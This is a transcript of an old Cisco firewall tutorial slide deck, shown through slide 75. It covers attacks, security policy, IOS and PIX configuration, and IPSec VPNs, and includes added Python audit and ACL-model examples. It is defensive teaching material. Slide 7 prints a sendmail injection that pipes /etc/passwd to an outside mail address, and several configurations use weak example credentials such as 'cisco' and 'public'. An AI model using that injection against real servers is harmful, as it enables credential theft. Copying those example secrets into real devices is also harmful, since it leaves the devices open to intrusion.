Cisco - Internet Firewall Technology Tutorial


Transcript of Cisco - Internet Firewall Technology Tutorial

  • 8/13/2019 Cisco - Internet Firewall Technology Tutorial

    Slide 1/90

    0999_03F8_c2

    NW98_US_407

    Internet Firewall Technology Tutorial

  • Slide 2/90

    Agenda

    Motivation: Threats and Attacks

    Business Need

    Design and Test Principles

    Policy

    Architecture

    Design

    Implementation

    Cisco Solutions

  • Slide 3/90

    Motivation: Security Threats and Common Network Attacks

  • Slide 4/90

    Security Threats

    Figure: four threat classes, each with an illustration. Impersonation: "I'm Bob, send me all corporate correspondence with Cisco". Loss of Integrity: a bank customer's "Deposit $1000" is altered in transit to "Deposit $100". Denial of Service: the target's CPU is exhausted. Loss of Privacy: a "telnet foo.bar.org" login with username dan is observed on the wire, including the password, character by character (m-y-p-a-s-s-w-o-r-d).

  • Slide 5/90

    Exploit Host Weaknesses

    Figure: a host at 10.1.1.1 is taken over by exploiting a weakness on the host itself ("Good Bye").

  • Slide 6/90

    Common Attacks

    Routing attacks

    Wiretapping

    Active content

    ICMP attacks

    Denial of service attacks

    TCP sequence attacks

  • Slide 7/90

    Send Mail Attacks

    Grabbing the /etc/passwd file; injecting a file or running a script

    mail from: "|/bin/mail [email protected] < /etc/passwd"
    250 "|/bin/mail [email protected] < /etc/passwd"... Sender ok
    rcpt to: mickeymouse
    550 mickeymouse... User unknown
    data
    354 Enter mail, end with "." on a line by itself
    250 Mail accepted
    quit

  • Slide 8/90

    Password Cracking

    Figure: screenshot of a password-cracking tool. Features listed: graphical brute forcing, cracking NT passwords, network session

  • Slide 9/90

    Newer Internet Attacks

    Teardrop 1: A fragmentation attack that works by exploiting a reassembly bug with overlapping fragments, and causes the targeted system to crash or hang

    Teardrop 2: The first fragment starts at offset 0 and the second fragment is within the TCP header

    Land: Takes a SYN packet whose source address and port are the same as the destination's

  • Slide 10/90

    Other Items

    SNMP v1 strings

    CERT advisories

    X11, RPC, NIS, NFS, NTP, finger

    UDP high ports; TCP high ports

  • Slide 11/90

    Service Configuration

    no service finger
    no service pad
    no service tcp-small-servers
    no service udp-small-servers
    no ip bootp server
    no ip source-route
    service password-encryption
    enable secret YellowMegaMan
    no enable password
    no ip redirects
    no ip directed-broadcast
    no ip proxy-arp
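As an added example that is not part of the slide deck, the following Python checks a saved IOS configuration for the settings listed on this slide; it treats the first nine as global commands and the last three (ip redirects, directed-broadcast, proxy-arp) as per-interface commands, and the two sample configurations are constructed, with a placeholder enable secret hash.

```python
# Audit an IOS configuration text for the hardening items on the slide.
# The two config samples at the bottom are constructed for the example.
REQUIRED_GLOBAL = [
    "no service finger",
    "no service pad",
    "no service tcp-small-servers",
    "no service udp-small-servers",
    "no ip bootp server",
    "no ip source-route",
    "service password-encryption",
]
REQUIRED_PER_INTERFACE = [  # these three are interface-level commands
    "no ip redirects",
    "no ip directed-broadcast",
    "no ip proxy-arp",
]


def parse_ios(config: str):
    """Split a config into global lines and {interface name: [lines]} blocks."""
    global_lines, interfaces, current = [], {}, None
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue                            # blank lines and '!' separators
        if raw[0] != " ":                       # top-level command
            current = None
            if raw.startswith("interface "):
                current = raw.split(None, 1)[1].strip()
                interfaces[current] = []
            else:
                global_lines.append(raw.strip())
        elif current is not None:               # indented line inside an interface block
            interfaces[current].append(raw.strip())
    return global_lines, interfaces


def audit(config: str):
    """Return findings as strings; an empty list means every item on the slide is present."""
    global_lines, interfaces = parse_ios(config)
    gset = set(global_lines)
    findings = [f"global: missing '{item}'" for item in REQUIRED_GLOBAL if item not in gset]
    if not any(line.startswith("enable secret ") for line in gset):
        findings.append("global: no 'enable secret' configured")
    if any(line.startswith("enable password ") for line in gset):
        findings.append("global: 'enable password' still present (slide: no enable password)")
    for name, lines in interfaces.items():
        iset = set(lines)
        findings += [f"interface {name}: missing '{item}'"
                     for item in REQUIRED_PER_INTERFACE if item not in iset]
    return findings


# Constructed: a router left at defaults with a plaintext enable password.
WEAK_CONFIG = """\
!
hostname edge-router
enable password cisco
!
interface Ethernet0
 ip address 10.1.1.1 255.255.255.0
!
"""

# Constructed: the same router after applying the slide (placeholder secret hash).
HARDENED_CONFIG = """\
!
hostname edge-router
no service finger
no service pad
no service tcp-small-servers
no service udp-small-servers
service password-encryption
enable secret 5 $1$PLACEHOLDER$hashgoeshere
no ip bootp server
no ip source-route
!
interface Ethernet0
 ip address 10.1.1.1 255.255.255.0
 no ip redirects
 no ip directed-broadcast
 no ip proxy-arp
!
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit(cfg) or "OK")
```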

  • Slide 12/90

    Motivation: Business Need

  • Slide 13/90

    Traditional Business

    Figure: the Enterprise at the centre, with Employees, Partners, Customers and Suppliers as separate constituencies around it.

  • Slide 14/90

    The Need to Be Networked

    A new model of information technology

    Being connected is not enough, electronic commerce is not enough

    You need to be networked to all your important constituencies

    Open up internal operational systems and information to prospects, customers, partners, suppliers, and employees

  • Slide 15/90

    The Global Networked Business

    Figure: the Enterprise networked directly with Employees, Customers, Partners and Suppliers.

  • Slide 16/90

    Design: Policy

  • Slide 17/90

    What Are the Business Problems You Are Trying to Solve?

    Figure: the Internet business need drives the security considerations for four scenarios: Internet Access, Internet Presence, Networked Commerce, and VPN and Extranets.

  • Slide 18/90

    What Are Their Risks?

    Figure: a risk factor diagram relating the five quantities below; the edges carry the pairwise factors and the sign (+ or -) of each influence.

    R: Risk; S: Safeguard; T: Threat; V: Value; W: Weakness

    RSF: Risk-Safeguard Factor; RVF: Risk-Value Factor; STF: Safeguard-Threat Factor; SVF: Safeguard-Value Factor; VTF: Value-Threat Factor; WTF: Weakness-Threat Factor

  • Slide 19/90

    Simplified Causal Diagram

    Figure: causal diagram linking Threat, Weakness, Value, Safeguard and Assurance to Risk, with + and - signs on the edges showing whether each quantity raises or lowers the next.

    Threat: Hazards facing the information (attacks/time)

    Weakness: Vulnerability of the processing ($/attack)

    Safeguard: Methods of protection ($/time)

    Value: Dollar value of information ($)

    Assurance: Confidence factor ($/time)

  • Slide 20/90

    Internet Access

    Applications: Web access and e-mail (using an external mail server)

    Streaming audio/video

    Security issues: Protection of internal resources from outsiders

    Limiting external privileges of internal users

    Visibility of internal network addresses

    Auditing usage and possible attacks

  • Slide 21/90

    Internet Presence

    Additional applications: E-mail server managed locally

    Web server

    Additional security issues: Protection of public resources

    Separation of public and internal networks

    Authentication of remote users

  • Slide 22/90

    Networked Commerce

    Additional applications: Electronic commerce with controlled access to business systems for ordering, etc.

    Additional security issues: Secure gateway-internal communication

    Client-commerce gateway encryption

    Strong application authentication of client

    Figure: commerce gateways sit between the Internet and the internal business systems.

  • Slide 23/90

    VPN and Extranets

    Additional applications: Private connections over public network

    Virtual Private Network (VPN)

    Additional security issues: Encryption between remote users/sites and HQ

    Very strong network authentication of client

    Figure: HQ connected over the Internet to a remote site, to mobile and home users, and to an extranet partner.

  • Slide 24/90

    Design: Architecture

  • Slide 25/90

    What Is a Firewall?

    "I think it was Pope Urban that first attempted a definition in 1094. He enforced his definition in 1095-1099. Zangi, the Prince of Mosul refuted it in 1144 and Saladin was left to stave off Pope Eugenius III and St. Bernard between 1146 and 1148. And, as everyone knows, Richard the Lion Hearted debated the definition with Saladin between 1189 and 1192 without a resolution. All of this is to say that this can become a religious issue and many deaths will occur from it." (Chris Lonvick)

  • Slide 26/90

    Security Technology Taxonomy

    Identity: Accurately identify network users and their privileges

    Integrity: Network integrity through secure network perimeters, privacy and encryption, and reliable operation

    Active Audit: Provide auditing, accounting and active detection and response

  • Slide 27/90

    Firewall Design Criteria One

    Where is your policy? Implement it

    Hosts offering public services/access are not secure

    Internal network hosts should not offer public services/access

    Private networks and hosts should not be visible

  • Slide 28/90

    Firewall Design Criteria Two

    Know your network

    Security for multiple Internet access points

    Management and operation comfort

    Network security cannot replace data security

    Detailed security and usage accounting

  • Slide 29/90

    Firewall Design Criteria Three

    A robust firewall is typically not one device

    Layered topology; defense in depth

    Redundancy and failover

    Response plan

  • 8/13/2019 Cisco - Internet Firewall Technology Tutorial

    30/90

    300999_03F8_c2

    NW98_US_407

    Internet Access Firewall Topology

    Outside

    Reasonable features and

    performance at a low cost

    Usually a router withfirewall capabilities

  • Slide 31/90

    Internet Presence Firewall Topology

    Dedicated firewall platforms

    Multiple interfaces/layers

    Many features, high performance

    Figure: the firewall separates the outside from the internal network and from demilitarized zones (DMZs) holding the public access servers.

  • Slide 32/90

    Lock-and-Key

    Situation: you want a subset of hosts on a network to access a host on a remote network protected by a firewall

    With lock-and-key access, you can enable only a desired set of hosts to gain access by having them authenticate through a TACACS+ server

  • Slide 33/90

    Lock-and-Key Configuration

    aaa authentication login lockkey tacacs+ enable
    access-list 101 dynamic telecommuter timeout 5 permit ip any any
    access-list 101 permit tcp any host 10.1.1.1 eq 23
    interface e0
     ip address 10.1.1.1 255.255.255.0
     ip access-group 101 in
    tacacs-server host 1.1.1.1
    tacacs-server key cisco
    line vty 0 4
     password 7 telecommuter
     login authentication lockkey
     autocommand access-enable timeout 2
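As an added example that is not part of the slide deck, this Python model walks through what the configuration above does: access-list 101 admits only telnet to the router (so users can authenticate) until a successful login runs access-enable and creates the temporary dynamic entry, which then expires after 5 minutes absolute (the dynamic entry's timeout 5) or 2 minutes idle (access-enable timeout 2). It also models a caveat a practitioner should know: access-enable without the host keyword opens the dynamic entry for every source, not just the host that authenticated. The user table is a constructed stand-in for the TACACS+ server, and all addresses other than 10.1.1.1 are constructed.

```python
from dataclasses import dataclass, field

ROUTER_IP = "10.1.1.1"                  # interface e0 on the slide
ABSOLUTE_TIMEOUT = 5.0                  # 'access-list 101 dynamic ... timeout 5' (minutes)
IDLE_TIMEOUT = 2.0                      # 'autocommand access-enable timeout 2' (minutes)

# Constructed stand-in for the TACACS+ user database (not on the slide).
USERS = {"dan": "s3cret-example"}


@dataclass
class DynamicEntry:
    created: float
    last_hit: float


@dataclass
class LockAndKey:
    host_only: bool = True              # True models 'access-enable host timeout 2'
    dynamic: dict = field(default_factory=dict)   # source ("any" or an IP) -> DynamicEntry

    def login(self, user, password, source, now):
        """A telnet login on the vty; on success the autocommand creates the dynamic entry."""
        if USERS.get(user) != password:
            return False
        key = source if self.host_only else "any"
        self.dynamic[key] = DynamicEntry(created=now, last_hit=now)
        return True

    def _expire(self, now):
        for key, entry in list(self.dynamic.items()):
            if now - entry.created >= ABSOLUTE_TIMEOUT or now - entry.last_hit >= IDLE_TIMEOUT:
                del self.dynamic[key]

    def permit(self, proto, src, dst, dport, now):
        """Evaluate a packet arriving inbound on e0 against access-list 101."""
        self._expire(now)
        # Entry 1: the dynamic 'permit ip any any', present only after a successful login.
        for key in (src, "any"):
            if key in self.dynamic:
                self.dynamic[key].last_hit = now
                return True
        # Entry 2: 'permit tcp any host 10.1.1.1 eq 23' lets users reach the router to authenticate.
        if proto == "tcp" and dst == ROUTER_IP and dport == 23:
            return True
        return False                    # implicit deny at the end of the list


def walkthrough():
    """Replay a telecommuter session against the slide's ACL; times are minutes."""
    acl = LockAndKey(host_only=True)
    r = []
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=0))      # False: no entry yet
    r.append(acl.permit("tcp", "192.0.2.10", ROUTER_IP, 23, now=0))         # True: may telnet to the router
    r.append(acl.login("dan", "wrong", "192.0.2.10", now=0))                # False: nothing created
    r.append(acl.login("dan", "s3cret-example", "192.0.2.10", now=0))       # True: dynamic entry created
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=1.0))    # True
    r.append(acl.permit("tcp", "192.0.2.11", "10.1.1.50", 80, now=1.0))    # False: other host, host keyword
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=2.5))    # True: inside both timeouts
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=4.0))    # True
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=5.5))    # False: 5 min absolute timeout
    acl.login("dan", "s3cret-example", "192.0.2.10", now=10)                # new entry, then no traffic
    r.append(acl.permit("tcp", "192.0.2.10", "10.1.1.50", 80, now=12.5))   # False: 2 min idle timeout
    return r


def open_entry_caveat():
    """Without the 'host' keyword the dynamic entry is 'permit ip any any' for everyone."""
    acl = LockAndKey(host_only=False)
    acl.login("dan", "s3cret-example", "192.0.2.10", now=0)
    return acl.permit("tcp", "198.51.100.7", "10.1.1.50", 80, now=0.5)     # True: unauthenticated host


if __name__ == "__main__":
    print(walkthrough())
    print("open entry lets another host in:", open_entry_caveat())
```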

  • Slide 34/90

    Networked Commerce

    Coupled gateway and application servers

    Encryption and authentication

    Figure: encrypted transactions from the outside terminate on a Web commerce gateway coupled to the application servers.

  • Slide 35/90

    VPNs and Extranets

    Strong encryption, authentication

    Routers, firewalls, end systems

  • Slide 36/90

    IPSec: Standard for VPN Encryption

    Standards compliance: IPSec AH/ESP encapsulated tunnels; IKE key management

    Fully interoperable: Cisco IOS, Firewalls, and other IPSec-compliant systems

    Client support: Windows 95 and Windows NT 4.x (Cisco provided software); Windows NT 5.0 (Microsoft/Cisco partnership)

    Figure: encrypted IP between the internal network and the Internet.

  • Slide 37/90

    IPSec Modes

    Original packet: IP HDR | Data

    Transport Mode (the original IP header is kept and the IPsec header is inserted before the data):

    IP HDR | IPsec HDR | Data        (Data may be encrypted)

    Tunnel Mode (the whole original packet is encapsulated behind a new IP header):

    New IP HDR | IPsec HDR | IP HDR | Data        (IP HDR and Data may be encrypted)

  • Slide 38/90

    Virtual Private Network Example

    Figure: traffic is in the clear on the LAN behind 128.49.48.1, encrypted between the two peers 128.49.48.1 and 128.49.54.1, and in the clear again behind 128.49.54.1.

  • Slide 39/90

    VPN Configuration

    crypto ipsec transform-set first ah-md5-hmac
     mode tunnel
    crypto ipsec transform-set second ah-sha-hmac esp-des
     mode tunnel
    !
    crypto isakmp policy 5
     authentication rsa-encr
     hash md5
     lifetime 3600
    !
    crypto map toBob 10 ipsec-isakmp
     set peer 128.49.54.1
     set transform-set first second
     match address 155
    !
    interface e0
     ip address 128.49.48.1 255.255.255.0
     crypto map toBob
    !
    access-list 155 permit ip 128.49.48.1 0.0.0.255 128.49.54.1 0.0.0.255

    Define IPsec policy: two transform sets providing encryption and authentication

    Set IKE policy

    Create a crypto map: define negotiating peer, prioritize IPsec policy, match an access list

    Configure interface, assign crypto map

    Define access list to encrypt all traffic

  • Slide 40/90

    Design: Test

  • Slide 41/90

    Firewall Test Criteria One

    Where is your policy? Who controls routers? Who controls firewalls? Who makes up the security team?

    Check policy and well-known holes

    Scan the network

    Test the firewall and the services behind it

    Use verification and IDS tools

  • Slide 42/90

    Firewall Test Criteria Two

    Do things work as expected?

    Scan firewall

    Scan DMZ and services

    Scan internal network

    Invert policy rules on sniffer

    Log and document everything

  • Slide 43/90

    Logging

    service timestamps debug datetime msec
    service timestamps log datetime msec
    logging buffered 16384
    logging trap debugging
    logging 169.222.32.1
    logging source-interface loopback0
    access-list 101 permit tcp any host 10.1.1.1 eq 23 log
    ip ftp source-interface loopback0
    ip ftp username c7200
    ip ftp password 7 8675309G
    exception protocol ftp
    exception dump 10.1.1.1

  • Slide 44/90

    Firewall Test Criteria Three

    Testing never ends

    Know your network

    Review logs

    Educate staff and users

    Keep revisions up to date

  • Slide 45/90

    Implementation: Cisco Solutions

  • Slide 46/90

    Cisco Firewall Product Line

    Figure: products positioned by performance and feature set: Cisco 1600/2500 with Cisco IOS FW Features, Centri Firewall for Windows NT, and PIX Firewall.

  • Slide 47/90

    Supported Applications

    Telnet, Web, FTP, and SMTP

    RealAudio, RealVideo, and VDOLive

    Lotus Notes, IMAP, and LDAP

    DNS resolves and zone transfers

    RPC, R-Commands

    Other generic IP, TCP, and UDP

  • Slide 48/90

    Java Blocking

  • Slide 49/90

    Java Blocking

    Figure: the inspect port command. A Web client requests a Java applet; when the server reply arrives, inspect looks for the Java signature. If the signature is present it drops the packet; if there is no Java signature it lets the reply through to the client.

  • Slide 50/90

    Attack Detection and Prevention

    Events: monitors the following statistics and conditions:

    Total embryonic connections

    Per minute incoming new connection rate

    Timer for TCP connections to reach established state

    Packet count for duplicate syn packets

    Packet sequence numbers

  • Slide 51/90

    Alerts

    Non-statistical events may trigger alerts

    Alerts set on groups of events or specific ones: DoS attacks, SMTP command attacks, or denied Java applet

    Alerts are visual, email, and pager

    Thresholds limit the number of alerts issued when repeating in a given timeframe

    Email is based on MAPI (install Messaging)

    Beeper is based on TAPI

  • Slide 52/90

    Adaptive Security Algorithm (ASA)

    Provides stateful connection policy

    Connections allowed out allow the return session back (backflow); incoming connections must be explicitly enabled

    Initial TCP sequence number randomized

    Tracks source and destination ports + addresses, TCP sequences, and additional TCP flags

    Access control list (ACL) policy support

    UDP + TCP session state: TCP uses the FIN bit; UDP uses a one-minute default timer (except for DNS)

  • Slide 53/90

    TCP Connections Inside to Outside: Initialization Phase

    Assume data length = 100 octets; checksum is modified, not recalculated.

    Figure: each packet is drawn with its checksum, source IP address, destination IP address, source port, destination port, sequence number, TCP checksum, code bits and acknowledge number. The outside leg is labelled "IP Spoofing Connection" and the return "Back Spoofing".

    Sender (inside host 10.0.0.14) sends SYN to 171.68.10.2, source port 4005, destination port 23, sequence number 100.

    PIX checks if a translation exists or not. If not, it creates one upon verifying NAT, global, access control and authentication, if any; a connection is also created. The SYN leaves with source address 171.69.236.5 and the initial sequence number randomized to 3050.

    Receiver and responder (171.68.10.2) answers SYN-ACK to 171.69.236.5 port 4005 with sequence number 31 and acknowledge number 3151.

    PIX follows the adaptive security algorithm: (src IP, src port, dest IP, dest port) check; sequence number check; translation check. The SYN-ACK is forwarded to 10.0.0.14 with the acknowledge number rewritten to 201.

    If the packet code bit was not SYN-ACK, the packet would have been dropped and logged.

  • Slide 54/90

    TCP Connections Inside to Outside: Data Transfer

    Figure: the same packet fields as on the initialization slide.

    Sender 10.0.0.14 sends data to 171.68.10.2 (port 4005 to 23) with the ACK bit set, sequence number 201, acknowledge number 132.

    Since the ACK bit is set, connection and translation entries should exist. PIX forwards the segment as 171.69.236.5 to 171.68.10.2 with the sequence number rewritten to 3151.

    Receiver and responder answers from port 23 to 4005 with ACK set and sequence number 132; ASA checks again before translating the reply back to 10.0.0.14.

  • Slide 55/90

    TCP Connections Inside to Outside: Termination Phase

    Assume data length = 100 octets; checksum is modified, not recalculated.

    Figure: the same packet fields as on the initialization slide.

    Sender 10.0.0.14 sends FIN to 171.68.10.2 (port 4005 to 23) with sequence number 1000 and acknowledge number 8000; PIX forwards it as 171.69.236.5 with the sequence number rewritten to 3950.

    Receiver and responder answers FIN-ACK (port 23 to 4005) with sequence number 800 and acknowledge number 4051; PIX forwards it to 10.0.0.14 with the acknowledge number rewritten to 1101.

    PIX will only accept a packet with code bit FIN-ACK

    All other packets dropped

    Any packet after this packet would also be dropped

    Connection released immediately

    Translation released after xlate timeout

  • Slide 56/90

    Static vs. Conduit

    Static: A static maps a global (outside) address to an inside (local) address. Any access to the global goes to the mapped inside address. This gives an inside machine with an illegal address a presence on the outside with a legal address. A static is secure (protected).

    Conduit: A conduit is a hole through the firewall allowing outside machines to initiate connections to inside machines. It is related to a static in that a static maps a global address to a local machine. Conduits are only as secure as you make them. They are used for service items.

  • Slide 57/90

    Authorization

    Figure: user Joe on the Internet telnets through the PIX Firewall to Inside Host A on the intranet (DNS/Mail sit in the DMZ). The PIX consults Cisco Secure, whose user profile for Joe reads: id=Joe, Fail=0, Service=Shell, Cmd=Telnet {Permit Host A}, Cmd=FTP {Permit Host B}.

  • Slide 58/90

    SYN Flood Defender

    Throttles both internal and external maximum sessions

    Inbound: controls SYN flooding (denial of service)

    Outbound: limits maximum sessions (controls applications such as Microsoft's Internet Explorer)

    Protects session resources from being depleted

    Maintains high network reliability

  • Slide 59/90

    SYN Floods Trying to Kill the Mail Server

    Figure: SYNs arrive from the Internet (outside) toward the inside mail server over SMTP; with the PIX limit set to 2, the first two embryonic connections are allowed and the third SYN is stopped.

  • Slide 60/90

    Content Filter Trying to

    Figure: the PIX content filter sits between the Internet (outside) and the inside mail server on SMTP; only the allowed commands pass. Labels: All Allowed Commands, Debug, OK, NOOP, Get INFO.

  • Slide 61/90

    Client VPN: PIX, Ravlin, IPSec

    Standards compliance: IPSec AH/ESP encapsulated tunnel; IKE key management

    Wire-speed performance: Ethernet now, Fast Ethernet late CY 98

    Fully interoperable: Cisco IOS and other IPSec-compliant systems

    Figure: encrypted IP between the internal network and the Internet.

  • Slide 62/90

    PIX with OTP Configuration

    Configuration on the PIX manager: Go to PIX manager: URL = 10.0.0.0.100:8080, username = pixadmin, password = cisco

    On PIX manager: Click authentication. Select TACACS+ server. Click add. Server IP address = 10.0.0.100, Encryption key: spackle. Click OK.

    On PIX manager: Select authentication. Click add. Select "authenticate all internal hosts" or whatever is desired. Click OK. Click save.

    Assume pin = 1234, Passcode = 5551212

  • Slide 63/90

    PIX with OTP Session

    Telnet prompt:
    Username: megaman
    Enter passcode: 5551212

    HTTP prompt (Internet Explorer): You need a password to access this page
    Resource: HTTP authentication
    Username: megaman
    Password: 5551212

    HTTP prompt (Netscape): Username and password required. Enter username for HTTP authentication at 172.16.50.87
    User name: megaman
    Password: 5551212

    FTP prompt:
    Connected to 172.16.50.87
    220 FTP authentication 220
    User (172.16.50.87:>:
    331 Enter PASSCODE: 331
    Password:
    230 220 TS09B6F FTP server (version Cisco Micro WebServer) ready
    331 Hello root, send password
    230 Login user root OK 230

  • Slide 64/90

    PIX with Three Interfaces

    Figure: the PIX joins three networks. Public network (Internet) on the outside interface. Perimeter network on the dmz interface 192.168.0.1, holding the Web server 192.168.0.2 and the FTP server 192.168.0.3. Private network on the inside interface 10.0.0.3, holding the server 10.0.0.100 and a web server for the inside network whose access is allowed only from 172.28.0.0 and 172.16.50.0.

  • Slide 65/90

    PIX with Three Interfaces

    nameif ethernet0 outside security0
    nameif ethernet1 inside security100
    nameif ethernet2 dmz security50
    enable password 8Ry2YjIyt7RRXU24 encrypted
    passwd 2KFQnbNIdI.2KYOU encrypted
    hostname pixfirewall
    failover
    names
    name 192.168.0.2 webserver
    name 192.168.0.3 ftpserver
    pager lines 24
    syslog output 20.3
    no syslog console
    interface ethernet0 auto
    interface ethernet1 auto
    interface ethernet2 auto
    ip address outside 172.16.50.3 255.255.255.0
    ip address inside 10.0.0.3 255.0.0.0
    ip address dmz 192.168.0.1 255.255.255.0
    arp timeout 14400
    global (outside) 1 172.16.50.76-172.16.50.85
    global (dmz) 1 192.168.0.90-192.168.0.99
    nat (inside) 1 10.0.0.0 255.0.0.0
    nat (dmz) 1 192.168.0.0 255.255.255.0
    static (dmz,outside) 172.16.50.76 webserver 200 200
    static (dmz,outside) 172.16.50.77 ftpserver

  • Slide 66/90

    PIX with Three Interfaces (continued)

    static (inside,outside) 172.16.50.80 10.0.0.110
    conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0
    conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
    conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0
    conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0
    conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0
    conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0
    age 10
    rip outside passive
    no rip outside default
    rip inside passive
    rip inside default
    no rip dmz passive
    rip dmz default
    route outside 0.0.0.0 0.0.0.0 172.16.50.1 1
    timeout xlate 24:00:00 conn 12:00:00 udp 0:02:00
    timeout rpc 0:10:00 h323 0:05:00 uauth 0:05:00
    tacacs-server host 10.0.0.100 abc
    aaa authentication any inbound 0.0.0.0 0.0.0.0 tacacs+
    no snmp-server location
    no snmp-server contact
    snmp-server community public
    telnet 10.0.0.100 255.255.255.255
    mtu outside 1500
    mtu inside 1500
    mtu dmz 1500
    : end
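As an added example that is not part of the slide deck, this Python reads the name, global, static and conduit lines from the two configuration slides and decides which inbound connection attempts from the outside reach a DMZ or inside host: a static alone is protected, and a conduit's foreign address and mask decide who may use it. It also flags static addresses that fall inside the dynamic global pool, which the slide's pool 172.16.50.76-172.16.50.85 does for all three statics. The two outside source addresses are constructed.

```python
import ipaddress

# name, global, static and conduit lines copied from the two slides (old PIX conduit syntax).
PIX_CONFIG = """
name 192.168.0.2 webserver
name 192.168.0.3 ftpserver
global (outside) 1 172.16.50.76-172.16.50.85
static (dmz,outside) 172.16.50.76 webserver 200 200
static (dmz,outside) 172.16.50.77 ftpserver
static (inside,outside) 172.16.50.80 10.0.0.110
conduit (dmz,outside) 172.16.50.76 80 tcp 0.0.0.0 0.0.0.0
conduit (dmz,outside) 172.16.50.77 21 tcp 0.0.0.0 0.0.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.28.0.0 255.255.0.0
conduit (inside,outside) 172.16.50.80 21 tcp 172.16.50.0 255.255.255.0
conduit (inside,outside) 172.16.50.80 80 tcp 172.16.50.0 255.255.255.0
"""


def parse_pix(config):
    """Collect the outside global pools, statics (global ip -> (interface, local ip))
    and conduits (global ip, port, protocol, permitted foreign network)."""
    names, pools, statics, conduits = {}, [], {}, []
    for line in config.strip().splitlines():
        f = line.split()
        if f[0] == "name":
            names[f[2]] = f[1]
        elif f[0] == "global":
            lo, hi = f[3].split("-")
            pools.append((ipaddress.ip_address(lo), ipaddress.ip_address(hi)))
        elif f[0] == "static":
            high_if = f[1].strip("()").split(",")[0]          # the interface the local host is on
            statics[f[2]] = (high_if, names.get(f[3], f[3]))  # resolve 'name' aliases
        elif f[0] == "conduit":
            foreign = ipaddress.ip_network(f"{f[5]}/{f[6]}", strict=False)
            conduits.append((f[2], int(f[3]), f[4], foreign))
    return pools, statics, conduits


def evaluate(statics, conduits, proto, src_ip, dst_ip, dport):
    """Decide an inbound connection attempt from the outside; returns (verdict, detail)."""
    if dst_ip not in statics:
        return ("drop", "no static for the destination, so nothing is reachable")
    for glob, port, cproto, foreign in conduits:
        if (glob, port, cproto) == (dst_ip, dport, proto) and ipaddress.ip_address(src_ip) in foreign:
            interface, local = statics[dst_ip]
            return ("permit", f"{interface}:{local}")
    return ("drop", "static exists but no conduit matches: the static alone is protected")


def pool_conflicts(pools, statics):
    """Static addresses that also fall inside a dynamic global pool (a configuration defect)."""
    conflicts = []
    for glob in statics:
        addr = ipaddress.ip_address(glob)
        if any(lo <= addr <= hi for lo, hi in pools):
            conflicts.append(glob)
    return conflicts


def slide_checks():
    """Constructed outside sources: 203.0.113.9 (anyone) and 172.28.4.4 (in a permitted network)."""
    pools, statics, conduits = parse_pix(PIX_CONFIG)
    return {
        "web_dmz_anyone": evaluate(statics, conduits, "tcp", "203.0.113.9", "172.16.50.76", 80),
        "ftp_dmz_anyone": evaluate(statics, conduits, "tcp", "203.0.113.9", "172.16.50.77", 21),
        "inside_web_anyone": evaluate(statics, conduits, "tcp", "203.0.113.9", "172.16.50.80", 80),
        "inside_web_partner": evaluate(statics, conduits, "tcp", "172.28.4.4", "172.16.50.80", 80),
        "inside_smtp_partner": evaluate(statics, conduits, "tcp", "172.28.4.4", "172.16.50.80", 25),
        "no_static": evaluate(statics, conduits, "tcp", "203.0.113.9", "172.16.50.81", 80),
        "pool_conflicts": pool_conflicts(pools, statics),
    }


if __name__ == "__main__":
    for name, result in slide_checks().items():
        print(f"{name}: {result}")
```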

  • Slide 67/90

    Centri Firewall

    Windows NT Firewall

    ICSA certified

    Version 4.0.2 now shipping!

    Evaluation software on the web at: http://www.cisco.com/centri

  • Slide 68/90

    Ease of Use

    Installation Wizard: Steps through initial configuration; Predefined security policies

    Graphical policy manager: Drag-and-drop security policies

    Secure remote administration

  • Slide 69/90

    Secure Remote Administration

    Figure: administrators reach the Centri firewall across the ISP network and the Internet as well as from the private networks behind it.

    Secure remote admin: MS authenticated RPC; Centri's asymmetric authentication; from trusted or untrusted sides

  • Slide 70/90

    Reporting

    Reports may be run on demand and scheduled to run at fixed times (e.g. Mondays at 2 a.m.)

    Reports are presented in HTML or text and may be stored on the web server in the product (examiner) or sent to an e-mail address

    To view reports it is simple to use the embedded browser in Centri, though you may use another browser if desired (port 8080, no authentication)

    There are three types of reports:

    Warning (security issues and product oddities)

    Service (statistical details per service, no aggregates)

    Connection (polls for open connections per service, no aggregates)

  • Slide 71/90

    Flexible Security Policies

    Figure: a security policy (Open, Restrictive or Closed) can be selected by IP address (e.g. 161.44.75.12), by NT username, by application, or by time of day.

  • Slide 72/90

    Centri Firewall Architecture

    Kernel Proxies: Implemented in Windows NT Kernel

    Custom TCP/IP stack

    Packet-filtering speed, proxy functionality

    Protects against common vulnerabilities in Windows NT (WinNuke, NetBIOS holes, etc.)

    Intercept architecture: Preservation of original network stack

    Firewall communication is also protected

    Capability of running servers on the firewall

  • Slide 73/90

    Centri Firewall Design

    Figure: the outside interface (192.204.18.2) and inside interface (10.0.0.1) are served by a device driver in the NT kernel, where the kernel proxy performs content filtering and authentication; a virtual interface (10.0.0.2) connects the Microsoft TCP/IP stack, the third-party applications (DNS, Web, E-mail) and other services in the application layer.

  • Slide 74/90

    Kernel Proxy Sample Inbound Data Flow

    Figure: in kernel space, the interceptor takes packets from the untrusted network adapter (205.50.50.2) into the external protocol stack, passes them through the security verification engine and the internal protocol stack to the trusted network adapter (10.0.0.1) and on to the trusted server. A local communication channel links the kernel proxy to the Centri agents (e.g., authentication) in application space, and the Centri virtual adapter (10.0.0.2) feeds the native Microsoft NT TCP/IP stack, Winsock and the Winsock applications (e.g., Web, DNS, mail servers).

  • Slide 75/90

